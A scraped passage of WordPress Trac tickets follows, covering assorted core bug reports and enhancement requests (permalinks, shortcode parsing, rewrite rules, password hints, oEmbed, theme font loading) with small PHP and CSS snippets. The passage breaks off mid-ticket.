ticket #35197 I found some other strange behavior where a permalink of a published page will be overwritten by a newly created draft page. Here are the steps to reproduce it (''4.4''/''trunk''): '''Step 1''' Add a new page with the title ''""Test 1""''. When switching to the editor, a permalink is generated: ''http://your-site.com/test-1/'' '''Step 2''' Click the ''Edit'' button next to the generated permalink, change the permalink from ''""test-1""'' to ''""test""'', click ''OK'' and click the ''Publish'' button to publish the newly created page. '''Step 3''' Add a new page with the title ''""Test 2""''. When switching to the editor, a permalink is generated: ''http://your-site.com/test-2/'' '''Step 4''' Click the ''Edit'' button next to the generated permalink, change the permalink from ''""test-2""'' to ''""test""'' and click ''OK''. The permalink gets changed back to ''test-2'' correctly because the already published ''Test 1'' page is using ''test'' as a permalink. '''Step 5''' Click the ''Save Draft'' button to save the ''Test 2'' page as a draft. Do '''NOT''' publish it! '''Step 6''' Switch to the ''""All pages""'' area and open the ''Test 1'' edit page. '''Step 7''' SURPRISE! The permalink of the already published page ''Test 1'' changed from ''""test""'' to ''""test-2""''. Curiously when you hover the permalink it still uses the correct ''""test""'' permalink. [[Image(http://fs5.directupload.net/images/151223/r6gqvcph.png)]] '''Step 8''' Okay, now lets change something at the site. Add some text for example and click the ''Update'' button. After ''Step 8'' the permalink of the ''Test 1'' page gets changed to ''""test-2""'' while the ''Test 2'' page is using the ''""test""'' permalink now. There should be a patch for this because permalinks of already published pages can easily get changed when you are not aware of this problem. The main issue is that in this case all incoming links from third-party websites will not link to the correct page anymore." Asgaros Future Releases 49634 Performance Benchmarks for REST API REST API 5.4 normal normal Awaiting Review feature request new dev-feedback 2020-03-12T18:39:05Z 2020-04-30T21:36:38Z "We'd like to keep track of how fast, or slow, REST API requests are (and how they've changed as the code has changed). A bit like https://make.wordpress.org/core/2020/03/11/whats-new-in-gutenberg-11-march/ under ""Performance Benchmark"". Are there any tools that would help with this? It would be pretty great if the benchmarks were part of a test suite, or release process? This idea was just generally mentioned on https://wordpress.slack.com/archives/C02RQC26G/p1584037020137500" mnelson4 Future Releases 48710 PDF uploads are treated like images: empty alt attribute and PHP notices joedolson* Media normal normal 6.6 defect (bug) accepted dev-feedback 2019-11-18T20:42:21Z 2024-02-25T20:11:41Z "uploading a .pdf image in posts reads the following; ""this image has an empty alt attribute: its file name is.... .pdf"" I am a regular user since 1.5 versions of WP and this is my first bug, or error report. I tried downgrading, but it kept coming back error." worddean Future Releases 36179 Password protected post with force_ssl_admin() and domain mapping not working Login and Registration 4.3.1 normal normal defect (bug) new dev-feedback 2016-03-09T13:48:42Z 2019-06-04T20:23:26Z "Hi, I'm running a WordPress multisite with ""define(FORCE_SSL_ADMIN, true)"" and domain mapping. Our network site is using ssl (where users login to administrate their site). But a domain mapped site is not using ssl, which is working fine. So, I have a post that is password protected. When I'm on the mapped domain and submit the password protect form, I then get redirected to ""wp-login.php?action=postpass"" over https and get a security warning. It should not redirect me to https when I'm on a non-ssl mapped domain. Thanks" tcdeskwolf Future Releases 44333 Password hint label needs to be re-worded and needs to have a minimum password length check Login and Registration normal major Awaiting Review defect (bug) new dev-feedback 2018-06-08T14:39:10Z 2018-06-08T21:28:06Z "When resetting password, the help text under password box says: {{{ Hint: The password should be at least twelve characters long. To make it stronger, use upper and lower case letters, numbers, and symbols like ! "" ? $ % ^ & ). }}} Although it says **should be at least twelve characters long**, I am able to use only one character! 1. The above help text needs to be re-worded with some like: {{{ Hint: The recommended length of the password should be at least twelve characters and must have at least X characters. To make it stronger, use upper and lower case letters, numbers, and symbols like ! "" ? $ % ^ & ). }}} `X` can be a number say 6, 8 etc. 2. I believe there needs to be a minimum length check." subrataemfluence Future Releases 40835 Password and email change emails should not contain site-specific wording on multisite Users normal normal Awaiting Review defect (bug) new dev-feedback 2017-05-22T12:20:14Z 2017-05-22T12:20:14Z "With multisite enabled, the following three actions (there may be more) result in an email being sent to the user which contains wording specific to the site that the user happens to be on when they perform the action: * Attempt to change their email address. * Confirmed change of email address. * Changed password. As an example, here's the text from the ""Notice of Password Change"" email: {{{ Hi john, This notice confirms that your password was changed on Site B. If you did not change your password, please contact the Site Administrator at siteb@example.com This email has been sent to john@example.com Regards, All at Site B http://mtrunk.wp/siteb }}} This is misleading because it's not immediately clear whether my password was changed on all the sites on the network, or whether the change was specific to ""Site B"". In addition, the email address shown is the email address of the site administrator, not the network administrator. The site administrator does not necessarily have the ability to manage users. There may be similar considerations to those raised in #21352 regarding a user's awareness of the site being part of a network of sites." johnbillion Future Releases 56028 Pass the user object instead of recall get user function Users normal normal Awaiting Review defect (bug) reviewing dev-feedback 2022-06-21T21:04:15Z 2023-09-26T20:29:59Z "IN wp_ajax_send_password_reset we have {{{#!php <?php $user = get_userdata( $user_id ); $results = retrieve_password( $user->user_email ); }}} then in retrieve_password we have {{{#!php <?php if ( empty( $user_login ) ) { $errors->add( 'empty_username', __( '<strong>Error:</strong> Please enter a username or email address.' ) ); } elseif ( strpos( $user_login, '@' ) ) { $user_data = get_user_by( 'email', trim( wp_unslash( $user_login ) ) ); if ( empty( $user_data ) ) { $errors->add( 'invalid_email', __( '<strong>Error:</strong> There is no account with that username or email address.' ) ); } } else { $user_data = get_user_by( 'login', trim( wp_unslash( $user_login ) ) ); } }}} This patch allows us to pass a user object and bypass the second call to find the user " pbearne Future Releases 55956 Pass $maybe_orderby_meta into 'get_terms_orderby' filter Taxonomy 2.8 normal normal Awaiting Review enhancement new dev-feedback 2022-06-09T15:56:19Z 2022-06-09T15:56:19Z "The `get_terms_orderby` filter in `get_terms()` doesn't get passed the `$maybe_orderby_meta` parameter. If a plugin wants to use the `$maybe_orderby_meta` parameter when filtering the terms order, it must also filter `get_terms_args` and add the`$maybe_orderby_meta` argument to the `$args` array, so it can subsequently use it in the `get_terms_orderby` filter. ---- It would be additionally helpful to also pass `$orderby_raw` into the same filter, which would help plugin authors identify if `$orderby` had already been filtered or overridden. ---- Tangentially, the location of this filter is such that ordering by meta will always override it. A code comment says: {{{ // Run after the 'get_terms_orderby' filter for backward compatibility. }}} ...and I am sure that is the case, but I wonder if a back-compat break here would be fine, or whether maybe a newer, better filter at the end of that method would be best?" johnjamesjacoby Future Releases 57790 Parsing of Shortcode Attributes: bug locating a final attribute Shortcodes 6.1.1 normal normal Awaiting Review defect (bug) reopened changes-requested 2023-02-22T19:00:16Z 2023-02-28T12:38:15Z "`shortcode_parse_atts()` uses the `get_shortcode_atts_regex()` pattern to return all `attribute=""value""` matches, however the pattern does not account for shortcode strings where the final attribute pair does not have a space between `""` and `]` \\ \\ {{{ shortcode_parse_atts('[shortcode-name category=""banana-stand"" money=""yes""]'); //no space }}} returns {{{ Array( [0] => [shortcode-name [category] => banana-stand [1] => money=""yes""] ) }}} \\ whereas \\ {{{ shortcode_parse_atts('[shortcode-name category=""banana-stand"" money=""yes"" ]'); //has space }}} returns {{{ Array( [0] => [shortcode-name [category] => banana-stand [money] => yes [1] => ] ) }}} I ran the `get_shortcode_atts_regex()` pattern through a couple regex testers and verified that the issue is the non-capturing group conditional following the end-quote of a value. " lemernbag Future Releases 48223 parse_request(): When request has multiple matching rewrite rules, and matched rule returns 404 - iterate to next rewrite rule Rewrite Rules normal normal Awaiting Review defect (bug) new dev-feedback 2019-10-05T14:34:30Z 2020-05-13T20:43:55Z "A request might have multiple matching rewrite rules. {{{parse_request()}}} will take the top rule and attempt to parse it. If that rule results in an empty query, {{{is_404()}}} is set. In the case of a 404 error on the first matched rule, {{{parse_request()}}} should iterate to the next matched rule and attempt the next query. Example: A request might match all these rules=>queries: 1. {{{(.?.+?)(?:/([0-9]+))?/?$}}} => {{{pagename=$matches[1]&page=$matches[2]}}} 2. {{{([^/]+)(?:/([0-9]+))?/?$}}} => {{{name=$matches[1]&page=$matches[2]}}} If first query {{{pagename=$matches[1]&page=$matches[2]}}} returns 404, {{{parse_request()}}} should attempt the second query before returning a 404 error." apedog Future Releases 44997 Parent page of a page is not kept when saved as draft then published Posts, Post Types 4.9.8 normal normal Awaiting Review defect (bug) new dev-feedback 2018-09-26T15:44:14Z 2018-09-27T17:56:40Z "Write a page (page1) Write an other page (page2). Make that page parent of page1. Save it as draft. Then publish it: clic on publish, change the published date, then publish. The parent page of page2 is not page1 anymore" korsani Future Releases 16133 "Pagination issue with tag ""rss""" Canonical 3.0 normal normal defect (bug) new dev-feedback 2011-01-07T09:39:10Z 2019-06-04T19:22:09Z "When posts use ""RSS"" as a tag, and the /tag/rss/ page has more posts than it is set to display on one single page, the link to page 2: /tag/rss/page/2/ is redirected to: /category/page/2/ Tested on Paolo Belcastro test WordPress.org : http://test.belcastro.com/tag/rss/ Running 3.1-RC2-17229 with only Debug Bar plugin activated This is not theme related, same behaviour with TwentyTen or Thematic on this install." paolal Future Releases 11235 "Pages whose ancestors are not all ""published"" cannot be used as parents for other pages." Posts, Post Types 2.9 normal normal Future Release defect (bug) new needs-unit-tests 2009-11-23T01:04:01Z 2019-06-04T18:12:41Z Pages with trashed parents cannot be used as parents for other pages (they do not appear on the list). caesarsgrunt Future Releases 11049 Page Preview does not autosave page template nacin* Autosave 2.8.4 normal normal defect (bug) accepted dev-feedback 2009-10-30T21:19:34Z 2019-06-04T19:21:39Z When editing a published page, if you change the page template and then click Preview, the preview does not show the new template choice. janeforshort Future Releases 51548 Orphan cron on multisite Plugins normal normal Awaiting Review defect (bug) new dev-feedback 2020-10-16T05:41:44Z 2020-10-16T05:41:44Z "Hello, on a multisite, the upgrade task for plugins and themes are done in the network level. Each sites " sebastienserre Future Releases 41710 optionally obtain WP_* configuration constants from the environment Bootstrap/Load 4.8.1 normal normal Awaiting Review enhancement new dev-feedback 2017-08-23T04:51:51Z 2022-11-02T12:58:26Z "Although hardcoding strings inside a configuration is the traditional way to setup applications, having smooth configurations values is sometimes needed. The context of rising CI/virtualization/automated WP deployments increases the need of '''provisioning''' WP configuration (setup and adjunst DB credentials/debug-mode/site-url/... in an easy and flexible manner). wp-config.php currently imposes harcoding string values in a PHP-formatted regular text file. No file override, no override of the source of the values. This creates [https://github.com/docker-library/wordpress/blob/master/docker-entrypoint.sh#L110 coding] [https://github.com/wp-cli/scaffold-command/blob/master/templates/install-wp-tests.sh#L111 horrors] where people almost invent sed/awk-based PHP macro templating systems to simply configure a WP instance. The fact that wp-config.php uses PHP-format rather than ini/yaml is '''not''' the issue. The issue is that the current configuration does not offer the possibility of environment indirection. (the other ""issue"" being that developers are reluctant to create a modified copy of wp-config-sample.php {{{getenv()}}}-based, maybe to be future-proof in case of wp-config.php changes, maybe to respect user-provided changes) In the Unix world, environment has been the traditional and flexible way to transmit information to child processes. Is there any blocking wp-config.php from fetching some or all of its user-defined constants from the environment out of the box? Would maintainers consider such an enhancement? Some suggestions (among many possible others): 1. fetch from {{{getenv()}}} if {{{wp-config.php}}} is absent 2. fetch from {{{getenv()}}} if mandatory values of {{{wp-config.php}}} values are empty 3. fetch from {{{getenv()}}} even if {{{wp-config.php}}} values are empty 4. load {{{wp-config.$HOSTNAME.php}}} if present 5. load {{{wp-config.{PHP_SAPI}.php}}} if present 6. provide (and maintain) a {{{wp-config-env-sample.php}}} {{{getenv()}}}-based 7. ... [https://wordpress.org/support/topic/implement-env-variables-for-wp-config/ related forum post]" drzraf Future Releases 40348 Option to enable User Dashboard on single-site installations Users 3.0 normal normal Awaiting Review enhancement new dev-feedback 2017-04-03T19:45:58Z 2021-08-04T21:11:11Z "Since WordPress 3.0, the User Dashboard located at `/wp-admin/user/` has only been exposed to multisite installations. I would like the option to use this dashboard as a replacement for `profile.php`, even on single-site installations. ---- '''Why?''' Because `profile.php` is just 1 page, and plugins (like BuddyPress & bbPress) cannot user-centric data management without overriding the profile screen completely, which has the adverse affect of abandoning other plugins that have hooked into this screen. If we have to do that, we may as well invest more in the User Dashboard that already comes with WordPress core. My WP User Profiles plugin helps to re-imagine how the WordPress User experience might work & look, and comes with full integration into the User Dashboard. I'd like to bring that experience to single-site installations, and the core code currently explicitly prevents this behavior. ---- '''How?''' I believe, today, the User Dashboard should be off-by-default for single-site installations, and work as-is for multi-site installations. Plugins should be allowed to enable access to the User Dashboard, and plugins can then opt-into supporting that new dashboard in new & creative ways. I'm proposing that we simply enable this feature to function, and not that we completely jump head-first into supporting it in core and/or replacing `profile.php` entirely, at least not yet or my foreseeable future. ---- '''Caveats''' There are zero caveats for all existing WordPress installations, though as with any new feature, I can imagine the range of future scenarios from bad to good on how this could be used and/or abused. The one major bummer is that the Admin Settings API does not support either the Network or User dashboards, so saving options is still a completely custom affair. The theoretical Fields API could save us here, or maybe not. ---- This functionality is relatively easily achieved, and I'll be attaching a patch imminently." johnjamesjacoby Future Releases 49175 Optimize font-loading techniques for all WordPress Twenty themes Bundled Theme 5.3.2 normal normal Awaiting Review enhancement new dev-feedback 2020-01-12T08:09:55Z 2023-02-25T20:47:29Z "Right now, I'm using the Twenty Seventeen theme for several websites and the Google Font Libre Franklin, included in that theme, is loaded like this: {{{ <link rel=stylesheet id=twentyseventeen-fonts-css href='https://fonts.googleapis.com/css?family=Libre+Franklin%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C800%2C800i&subset=latin%2Clatin-ext' type=text/css media=all> }}} For performance reasons, given as this is a font which already has fallbacks defined in the {{{body}}} property, it'd be better to add {{{display=swap}}} and {{{rel=preload}}} to this link. Few links: [https://developers.google.com/web/updates/2016/02/font-display] [https://developers.google.com/web/updates/2016/03/link-rel-preload] [https://addyosmani.com/blog/google-fonts-font-display/] These small steps will **massively increase performance and PageSpeed scores for every core theme implementing these changes** for their Google Fonts. " mvanturnhoutziggonl Future Releases 47500 Optimize customizer load time Customize normal normal Awaiting Review enhancement new dev-feedback 2019-06-07T00:42:58Z 2021-05-31T16:22:13Z "Please see some discussion in slack for background and ideas https://wordpress.slack.com/archives/C0381N237/p1559852377000600 TLDR; More plugins and themes are using the customizer. It's a very good experience when making changes to options that affect the display of the site. As more controls are added the initial page render is taking longer and longer. Searching for things like ""WordPress customizer long load times"" results in tickets like https://wordpress.org/support/topic/customizer-takes-12-seconds-to-load/ In my own tests against a plugin I develop for I've found DOM Ready load times approaching 10 seconds. In default usage this is not apparent, but as themes and plugins use the customizer it becomes very slow. Ideally the initial page render should be more complete and then panels, sections, and controls can be added. This will make the page ""feel"" complete and more responsive." Nick_theGeek Future Releases 27122 Optimization for PHP FPM General 3.8 normal normal enhancement new dev-feedback 2014-02-13T22:59:21Z 2019-06-04T19:45:25Z "This patch make {{{ wp_ob_end_flush_all }}} calling {{{ fastcgi_finish_request }}} instead of {{{ ob_end_flush }}} when php-fpm is used. {{{ fastcgi_finish_request }}} flush the buffers '''and''' close the connection. This tweak increases page speed. It also allows to run heavy tasks such as sending mail, writing logs or making complex calculations after the end of the request without slowing down the whole page load. Symfony uses this tweak too, see this PR FOR further details: https://github.com/symfony/symfony/issues/1180" dunglas Future Releases 34722 Open P Tag in shortcode related to h tag Formatting 4.4 normal normal Awaiting Review defect (bug) new dev-feedback 2015-11-18T07:32:04Z 2017-07-20T07:25:55Z "Hi Wordpress core Team There is a bug in wordpress. When you add a simple text in the editor like this {{{ <h3>Integer in ex vel urna tempor ultrices.</h3> Morbi vehicula a orci nec dignissim. }}} In the front of the website and in the page source code this text is changed by wordpress to this and there are no issues or open or extra p-tags. {{{ <h3><p>Integer in ex vel urna tempor ultrices.</h3> <p>Morbi vehicula a orci nec dignissim.</p> }}} [[Image(http://i.imgur.com/9TCF7gi.png)]] However this does not happen in a shortcode F.e. if you create a simple shortcode to add a div with a class around your text. The result is open and or extra p-tags and break tags, {{{#!php <?php function theme_shortcode_div($atts, $content = null, $code) { $content = $content; return '<div class=""theme-div"">' . $content .'</div>'; } add_shortcode('theme_div', 'theme_shortcode_div'); }}} And add the text within a sshortcode {{{ [theme_div]<h3>Integer in ex vel urna tempor ultrices.</h3> Morbi vehicula a orci nec dignissim. [/theme_div] }}} The same text is rendered like this. {{{ <div class=""theme-div""><br /> <h3>Integer in ex vel urna tempor ultrices.</h3> <p> Morbi vehicula a orci nec dignissim. </div> }}} The p tag is never closed and before the h-tag there is suddenly a break tag. I tested this in any of the default themes and i dont know how many commercial themes and all with same results. The p tag is left open and there is a extra break tag. [[Image(http://i.imgur.com/52p291S.png)]] It can even gets worse if you add it like this and embed your text in a p-tag. {{{ [theme_div]<h3><p>Integer in ex vel urna tempor ultrices.</h3> Morbi vehicula a orci nec dignissim.</p> [/theme_div] }}} Now the end result is this {{{ <div class=""theme-div""><br /> <h3> <p>Integer in ex vel urna tempor ultrices.</h3> <p> Morbi vehicula a orci nec dignissim.</p> <p> </div> }}} There is suddenly a extra br tag before the h-tag a extra p tag suddenly in the h-tag and a extra p tag at the end of the div. [[Image(http://i.imgur.com/J3597aM.png)]] Note: All code has been added in text mode of the editor. The text was added as shown. H-tag and normal text without any break tag all on one line Note: used theme in my images twenty sixteen. Note: Shortcode added to the functions.php exactly as shown above. Note: You can only see the p-tags missing in the source of the page. If you inspect the page in firebug or chrome it shows the closing p-tags as that is what browsers do. They try to close the p-tags by default even if it is missing. [[Image(http://i.imgur.com/aTwn2Wg.png)]] Please resolve as this is a really annoying bug. " BackuPs Future Releases 38278 Only query taxonomies assigned to the post types being queried Taxonomy 4.7 normal normal Awaiting Review enhancement new dev-feedback 2016-10-10T20:28:53Z 2017-04-20T03:02:26Z "While working on #31383 (Add `WP_Tax_Query` support to `WP_User_Query`), it was brought up that taxonomy queries do not check to see whether the requested taxonomies are registered to the requested post type. Opening this ticket to discuss further. Should taxonomies always match the queried `post_type`? From @boonebgorges on the other ticket: Here's a way to frame the issue: are we likely to confuse developers if we allow (ie, don't throw errors for) queries like `get_users( ... 'tax_query' => ... 'taxonomy=post_tag' )`? Or `get_posts( ... 'tax_query' => ... 'taxonomy=some_user_taxonomy' )`? Or maybe these queries will just always end up empty? We should think through the possible confusions (or, maybe, lack thereof). " desrosj Future Releases 40012 Only add_metadata if no matching value Options, Meta APIs 2.9 normal normal Awaiting Review defect (bug) new dev-feedback 2017-03-02T02:04:43Z 2017-03-02T02:58:15Z "`add_metadata()` has a `$unique` parameter, but it only looks for a unique `meta_key` for the given object ID. I have a need to add meta-data with the same `meta_key` but different values, and only if that `meta_value` isn't already present with the same key. To do this now, requires: * Getting all meta-data for the ID by `meta_key` * Checking those array-values for my value * Bailing if it's already present, or... * Proceeding with `$unique` set to `false` It'd be lovely if `add_metadata()` either: * Accepted strings like `key`, `value` for the `$unique` parameter, to switch up the check * Added a second parameter for unique value in addition to a unique key" johnjamesjacoby Future Releases 45864 On list page All(x) count does not consider Trash items. Hence Trash should appear differently Posts, Post Types 5.0.2 normal normal Awaiting Review enhancement new dev-feedback 2019-01-08T13:29:48Z 2019-05-22T12:33:17Z "I find it confusing with the way WordPress shows `All(xx)` along with a broken down counts of each status when we have trashed items, `All(xx)` only considers un-trashed posts. So I feel displaying `Trash(xx)` exactly as rest of the status is not visually right. Since Trashed items are not considered in `All` count, it needs to be displayed a bit differently. I think if we can do something like the following it will look more logical. 1. Increase left margin before `Trash(xx)` so that it looks a bit separated. 2. Change the color of Trash link to `#dc3232`. Since `Delete Permanently` and `Trash` links are also using red color. 3. One more observation. We are writing `Published`, `Scheduled`, so I think rather `Trashed` could be used instead of `Trash` to match the rest. Here is a proposed solution: File: `/wp-admin/css/common.css` {{{ .subsubsub li.trash-posts { margin-left: 2rem; } .subsubsub li.trash-posts a { color: #dc3232; } }}} File: `wp-admin/includes/class-wp-list-table.php` {{{#!php <?php public function views() { ... foreach ( $views as $class => $view ) { if( 'trash' === $class ) { $views[$class] = ""\t<li class='$class trash-posts'>$view""; } else { $views[$class] = ""\t<li class='$class'>$view""; } } ... } }}} File: `wp-includes/post.php` {{{#!php <?php register_post_status( 'trash', array( 'label' => _x( 'Trash', 'post status' ), ... ... 'label_count' => _n_noop( 'Trash <span class=""count"">(%s)</span>', 'Trashed <span class=""count"">(%s)</span>' ), ... ) ); }}} Please let me know if this makes sense." subrataemfluence Future Releases 35707 On installation page, autocompleted password should not be visible. Upgrade/Install 4.3 normal normal defect (bug) new dev-feedback 2016-02-03T22:03:17Z 2020-02-15T17:48:03Z "We have a development server where new installations of WordPress are regularly created on the same domain. On the WP installation page, if you enter a username used elsewhere on the domain, the password field will be autocompleted if you have set the browser to remember it. The fact the autocomplete occurs is not a problem - however, the password appears in plain text. If anybody else is watching the screen, seeing a brand new random password for a brand new installation is OK (and you can click hide and change it if necessary) - but seeing a saved password from elsewhere is not. Autocompleted passwords should never appear in plain text. Removing autocomplete is one option, though some people may find it useful - but I think the ideal solution is that any changes to the password field should hide it automatically." smerriman Future Releases 41746 oEmbed does not respect canonical provider url parameter Embeds 2.9 normal normal Awaiting Review defect (bug) new needs-unit-tests 2017-08-28T20:30:45Z 2017-09-20T20:39:38Z "I came across a Twitter URL format that would not embed correctly. Providing that URL to their provider endpoint returned an error. But the original page had a `<link>` element which already had a working, canonical `url` parameter in its querystring. An example URL is: {{{https://twitter.com/i/web/status/898599373956722688}}} If you try to fetch oEmbed data for that URL by just adding it as a `url` querystring parameter on the standard Twitter oEmbed provider URL, it will return an error. But view source on that page, and you'll see: {{{<link rel=""alternate"" type=""application/json+oembed"" href=""https://publish.twitter.com/oembed?url=https://twitter.com/dimensionmedia/status/898599373956722688"" title=""David Bisset on Twitter: "Agorakit is a web based open source "groupware for citizens initiatives” (which i’ve seen @buddypress used for too) https://t.co/bFPw9ZZWi2 https://t.co/H1REt0QfcO""">}}} Note that the path of this URL is `.../{username}/status/{id}`, whereas the original URL was `.../i/web/status/{id}`. I've worked out a small patch and method for getting WordPress to use oEmbed discovery to extract and use the canonical URL. When using `wp_oembed_add_provider()`, if you leave the provider URL falsey, then `WP_oEmbed::get_provider()` will use discovery to find it (assuming that you haven't forced `discovery = false` in `$args`). Then my patch will pull the `url` arg from there and use that, instead of the original URL that was passed in to the embed handling. Later, when the JSON response is being handled, the code will still be able to see whether this is a whitelisted URL pattern, and bypass/perform security filtering such as `kses()` (see `wp_filter_oembed_result()`). " dougal Future Releases 51966 npm/grunt watch/build task names are inconsistent and unintuitive Build/Test Tools 5.1 normal normal Awaiting Review enhancement new dev-feedback 2020-12-08T17:07:24Z 2021-03-10T05:25:35Z "#43055 / #44492 made a lot of changes to the typical dev workflow, and I often have trouble getting the right watch or build command going, because they don't seem intuitive or consistent to me. The `dev` flag feels vague, and doesn't describe what it actually does (builds into `src/` instead of `build/`), the `npm` commands aren't always internally consistent, or consistent w/ the corresponding `grunt` commands. They're also syntax differences between `npm` and `grunt` which need to be memorized. Some examples: * There's `npm run build` and `npm run build:dev`, but the corresponding commands are `npm run watch` and `npm run dev`, instead of `npm run watch:dev`. * `npm run build` wraps `grunt build`, but `npm run dev` wraps `grunt watch --dev`; there is no corresponding `grunt dev` task. * running `npm run watch --dev` will run `grunt watch` (into `build/`) instead of `grunt watch --dev` (into `src/`). That's because `npm` uses `-- --` to pass a flag to the proxied command, but grunt uses `--`. The commands aren't clearly documented in the Handbook or readme file, so I have to read the `package.json` or `Gruntfile.js`, and try to memorize the inconsistencies. ==== Ideas I think it'd help to: * Add clear documentation about the purpose of the `src/` and `build/` folders, the pros/cons of running from each, and the commands needed for each scenario. * Rename the commands/flags to be self-documenting and consistent. I'll open a PR with a rough implementation of those as a starting point." iandunn Future Releases 38224 Not enough results in menu-page-add-search Menus 4.6.1 normal normal Awaiting Review defect (bug) new dev-feedback 2016-10-04T09:42:08Z 2017-01-31T20:35:38Z "While editing menu, trying to add a page, searching for the page ""research"" in a database with hundreds! of pages with this word in it, looking for that ONE page with just 'research' as title, the page is not listed admin/includes/nav-menu.php, _wp_ajax_menu_quick_search with type=quick-search-posttype-page the WP_Query lists posts_per_page = 10, but the search does NOT provide a paginator. I call this a bug because it is not working as intended; I assume you intended that the search would allow a page to be found, so the bug would be ""pagination is missing"" I have hard-coded a -1 to avoid the issue for now possible solutions are: - add pagination - add a filter on the arguments so we can set a different page-size without altering the code " clearsite Future Releases 56359 Non-existent URLs show contents of homepage instead of 404 error Permalinks 6.0 normal normal Awaiting Review defect (bug) new dev-feedback 2022-08-10T05:05:44Z 2023-05-18T15:28:40Z "In a fresh install of WordPress, I noticed that non-existent URLs would show the contents of the homepage instead of returning 404 Not Found. For example, when WordPress is configured to use the “Plain” permalink structure (which is the default), going to `http://example.com/does-not-exist/` would display the homepage instead of returning 404. The only time a 404 might be shown is when trying to access a post by its ID. For example, `http://example.com/?p=9999`. Is there something wrong with the “Plain” permalink setting that causes it to display the contents of the homepage instead of returning 404? " softrain Future Releases 44773 Non Existing Child Page of Custom Post Redirects Instead of 404 Rewrite Rules 4.9.8 normal critical Awaiting Review defect (bug) new dev-feedback 2018-08-10T19:33:17Z 2020-09-11T05:07:03Z "Steps to reproduce: 1. Register Custom Post Type with hierarchical set to true (We'll call it events) 2. Create the following structure in the CPT: * Test * Test 2 * Child (Child of Test 2) 3. Go to https://localhost/events/test/child and this will redirect you to https://localhost/events/test-2/child instead of returning a 404. Extra Step: If you create a normal page of ""Test"" and try to navigate to https://localhost/test/child, it will redirect to https://localhost/test-2/child. All this was done on vanilla WordPress on Twenty Seventeen theme. {{{ function register_my_cpts_events() { /** * Post Type: Events. */ $labels = array( ""name"" => __( ""Events"", """" ), ""singular_name"" => __( ""Event"", """" ), ); $args = array( ""label"" => __( ""Events"", """" ), ""labels"" => $labels, ""description"" => ""Event overview and resource pages"", ""public"" => true, ""hierarchical"" => true, ""menu_icon"" => ""dashicons-calendar-alt"", ""supports"" => array( ""title"", ""editor"", ""thumbnail"", ""excerpt"", ""revisions"", ""page-attributes"" ), ); register_post_type( ""events"", $args ); } add_action( 'init', 'register_my_cpts_events' ); }}} " Asitha Future Releases 57107 No-op `MagpieRSS` Feeds normal normal Awaiting Review enhancement new dev-feedback 2022-11-14T15:44:34Z 2023-05-30T16:34:08Z "MagpieRSS is an XML-based RSS parser built in the days of PHP 4.x. MagpieRSS has been deprecated in WordPress since version 3.0 was released in 2010. The library itself has not been updated since 2004 and is abandoned. Since then the library has continued to be included with WordPress to avoid breaking any sites that may have been using it. It has been deemed an ""adopted"" external library, but only the following very minor updates have been made: - inline documentation. - changes to avoid fatal PHP errors in modern versions of PHP. - changes to avoid deprecated notices/other warnings in modern versions of PHP. Looking at the plugin directory, there is [https://wpdirectory.net/search/01GHVBFXQJA6M0VH9FVT4HHF1S almost no meaningful usage of the class]. 90-95% of the matches are false positives related to identifying when a crawler is accessing pages/feeds. Enough time has passed since deprecating this class where no-opping can be considered to avoid continuing to ship code that no one is using." desrosj Future Releases 29312 No recommended nonce refresh functionality in Heartbeat. Administration 3.6 normal normal enhancement new dev-feedback 2014-08-22T07:49:19Z 2019-06-04T19:26:31Z "Oddly enough it seems there isn't an obvious way to refresh nonces that may be needed on the page after heartbeat-api login dialog. For example, go to wordpress plugins listing page, notice the activate, deactivate links all have a nonce part in the request. In a second tab, log out of the site, and go back to plugin listing page. After awhile, the page realizes it's not logged in, and pops up a log in screen. Log in, and click an ""activate"" or ""deactivate"" button. Notice it gives the nonce-failure message, ""are you sure you want to do this""? Because the previous session's nonces don't work. Why does Wordpress not know to refresh these nonces? I thought new nonces would be sent back as a heartbeat-ajax, but it looks like there isn't an ajax request with the login screen. It seems $(document).on('heartbeat-nonces-expired') can be used to detect when this situation happens, but it happens many times after login successful, is not just triggered once." programmin Future Releases 35651 No longer any consistent way to add content to bottom of comments form Comments 4.4 normal normal defect (bug) new dev-feedback 2016-01-28T22:12:22Z 2019-08-19T01:44:25Z "In #34731, there was a discussion on whether `comment_notes_after` should be directly after the comment form (now at the top by default), or at the bottom above the submit form (as the documentation described). The decision was to change the documentation. However, this now leaves no consistent way for themes/plugins to add content to the bottom of the form, above the submit button. Using `comment_notes_after` was a popular method to add notes like terms and conditios, or a subscribe checkbox etc, and consistent with the old documentation. All of these themes/plugins that relied on the positioning in the documentation will now have this output in the wrong place in the form. `comment_form_after_fields` isn't an alternative since it only applies when the user is logged out." smerriman Future Releases 42281 No Autoupdate for Translation files Upgrade/Install 4.8.2 normal normal Awaiting Review defect (bug) new dev-feedback 2017-10-19T17:48:13Z 2023-07-09T16:13:08Z "Codex says: Automatic translation file updates are already enabled by default, the same as minor core updates. But still a button ""update translations"" is shown in the Update Dashboard. This is ridiculous as I a) have no influence on accepting or skipping a certain translation, because b) there is no presention of the upcoming translation updates in advance As we have PTE and GTE for QA autoupdate is the right choice for translation files. Pls consider to remove the ""update translations"" buttons and substitute it with a email message as per minor core updates. " stk_jj Future Releases 21256 New theme feature - add_theme_support( 'content-width', $defaults ) chriscct7 Themes 3.4.1 normal normal Awaiting Review feature request assigned dev-feedback 2012-07-13T10:08:34Z 2018-11-22T22:16:27Z "Themes use '''$content_width''' variable to set the content area width, they use: {{{ if ( ! isset( $content_width ) ) $content_width = 500; }}} This method has two flaws, it's not flexible and it does not support different sizes for different post-types. WordPress has to make the content-width to be a builtin theme feature using '''add_theme_support()''', and make it more flexible and easy to update. I want to update this value using the Theme Customizer rather editing the function.php file. The code needs to be easy to set and to support CPT, some thing like this: {{{ $defaults = array( 'post' => '500', 'page' => '500', 'attachment' => '650', 'artist' => '300', 'movie' => '400' ); add_theme_support( 'content-width', $defaults ); }}} Just an idea for 3.5." ramiy Future Releases 14017 "New template ""tag"": get_custom_field()" obenland Posts, Post Types 3.0 normal normal Future Release enhancement assigned needs-unit-tests 2010-06-21T04:13:03Z 2022-08-14T14:59:34Z "It would be helpful to have a way to retrieve a custom field value that is somewhat agnostic of current context. '''Current way to do this''' In the header (i.e., before the Loop), one has to access the currently-queried object to get a custom value, with something like this: `$value = get_post_meta($GLOBALS['wp_query']->get_queried_object_id(), 'field', true);` In the Loop: `$value = get_post_meta(get_the_ID(), 'field', true);` And, lots of tutorials out there tell people to do things like the following, with varying degrees of success (depending on variable scope): `$value = get_post_meta($id, 